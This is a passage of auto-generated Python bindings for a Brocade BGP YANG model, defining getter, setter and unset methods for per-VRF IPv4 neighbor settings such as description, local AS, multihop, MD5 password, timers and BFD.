Getter method for description, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/description (neighbor-description)
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/description (neighbor-description)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """description must be of a type compatible with neighbor-description""",
'defined-type': "brocade-bgp:neighbor-description",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)""",
})
self.__description = t
if hasattr(self, '_set'):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
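  # The neighbor description is free-form text restricted to 1..220 characters.
  #
  #     nbr._set_description('uplink to dc1 border leaf')   # illustrative text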
def _get_local_as(self):
"""
Getter method for local_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/local_as (container)
"""
return self.__local_as
def _set_local_as(self, v, load=False):
"""
Setter method for local_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/local_as (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_as must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__local_as = t
if hasattr(self, '_set'):
self._set()
def _unset_local_as(self):
self.__local_as = YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_next_hop_self(self):
"""
Getter method for next_hop_self, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/next_hop_self (container)
"""
return self.__next_hop_self
def _set_next_hop_self(self, v, load=False):
"""
Setter method for next_hop_self, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/next_hop_self (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_next_hop_self is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_next_hop_self() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """next_hop_self must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__next_hop_self = t
if hasattr(self, '_set'):
self._set()
def _unset_next_hop_self(self):
self.__next_hop_self = YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_advertisement_interval(self):
"""
Getter method for advertisement_interval, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/advertisement_interval (container)
"""
return self.__advertisement_interval
def _set_advertisement_interval(self, v, load=False):
"""
Setter method for advertisement_interval, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/advertisement_interval (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_advertisement_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_advertisement_interval() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """advertisement_interval must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__advertisement_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_advertisement_interval(self):
self.__advertisement_interval = YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_ebgp_btsh(self):
"""
Getter method for ebgp_btsh, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_btsh (empty)
"""
return self.__ebgp_btsh
def _set_ebgp_btsh(self, v, load=False):
"""
Setter method for ebgp_btsh, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_btsh (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ebgp_btsh is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ebgp_btsh() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ebgp_btsh must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__ebgp_btsh = t
if hasattr(self, '_set'):
self._set()
def _unset_ebgp_btsh(self):
self.__ebgp_btsh = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_ebgp_multihop(self):
"""
Getter method for ebgp_multihop, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_multihop (container)
"""
return self.__ebgp_multihop
def _set_ebgp_multihop(self, v, load=False):
"""
Setter method for ebgp_multihop, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_multihop (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ebgp_multihop is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ebgp_multihop() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ebgp_multihop must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__ebgp_multihop = t
if hasattr(self, '_set'):
self._set()
def _unset_ebgp_multihop(self):
self.__ebgp_multihop = YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_password(self):
"""
Getter method for password, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/password (bgp-password)
"""
return self.__password
def _set_password(self, v, load=False):
"""
Setter method for password, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/password (bgp-password)
If this variable is read-only (config: false) in the
source YANG file, then _set_password is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_password() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """password must be of a type compatible with bgp-password""",
'defined-type': "brocade-bgp:bgp-password",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)""",
})
self.__password = t
if hasattr(self, '_set'):
self._set()
def _unset_password(self):
self.__password = YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
def _get_enforce_first_as(self):
"""
Getter method for enforce_first_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enforce_first_as (container)
"""
return self.__enforce_first_as
def _set_enforce_first_as(self, v, load=False):
"""
Setter method for enforce_first_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enforce_first_as (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_enforce_first_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enforce_first_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enforce_first_as must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__enforce_first_as = t
if hasattr(self, '_set'):
self._set()
def _unset_enforce_first_as(self):
self.__enforce_first_as = YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_timers(self):
"""
Getter method for timers, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/timers (container)
"""
return self.__timers
def _set_timers(self, v, load=False):
"""
Setter method for timers, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/timers (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_timers is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_timers() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """timers must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__timers = t
if hasattr(self, '_set'):
self._set()
def _unset_timers(self):
self.__timers = YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_remove_private_as(self):
"""
Getter method for remove_private_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remove_private_as (empty)
"""
return self.__remove_private_as
def _set_remove_private_as(self, v, load=False):
"""
Setter method for remove_private_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remove_private_as (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_remove_private_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remove_private_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remove_private_as must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__remove_private_as = t
if hasattr(self, '_set'):
self._set()
def _unset_remove_private_as(self):
self.__remove_private_as = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_as_override(self):
"""
Getter method for as_override, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/as_override (empty)
"""
return self.__as_override
def _set_as_override(self, v, load=False):
"""
Setter method for as_override, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/as_override (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_as_override is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_as_override() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """as_override must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__as_override = t
if hasattr(self, '_set'):
self._set()
def _unset_as_override(self):
self.__as_override = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_soft_reconfiguration(self):
"""
Getter method for soft_reconfiguration, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/soft_reconfiguration (container)
"""
return self.__soft_reconfiguration
def _set_soft_reconfiguration(self, v, load=False):
"""
Setter method for soft_reconfiguration, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/soft_reconfiguration (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_reconfiguration is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_reconfiguration() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """soft_reconfiguration must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__soft_reconfiguration = t
if hasattr(self, '_set'):
self._set()
def _unset_soft_reconfiguration(self):
self.__soft_reconfiguration = YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_static_network_edge(self):
"""
Getter method for static_network_edge, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/static_network_edge (empty)
"""
return self.__static_network_edge
def _set_static_network_edge(self, v, load=False):
"""
Setter method for static_network_edge, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/static_network_edge (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_static_network_edge is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_static_network_edge() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """static_network_edge must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__static_network_edge = t
if hasattr(self, '_set'):
self._set()
def _unset_static_network_edge(self):
self.__static_network_edge = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_bfd(self):
"""
Getter method for bfd, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/bfd (container)
"""
return self.__bfd
def _set_bfd(self, v, load=False):
"""
Setter method for bfd, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/bfd (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bfd() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
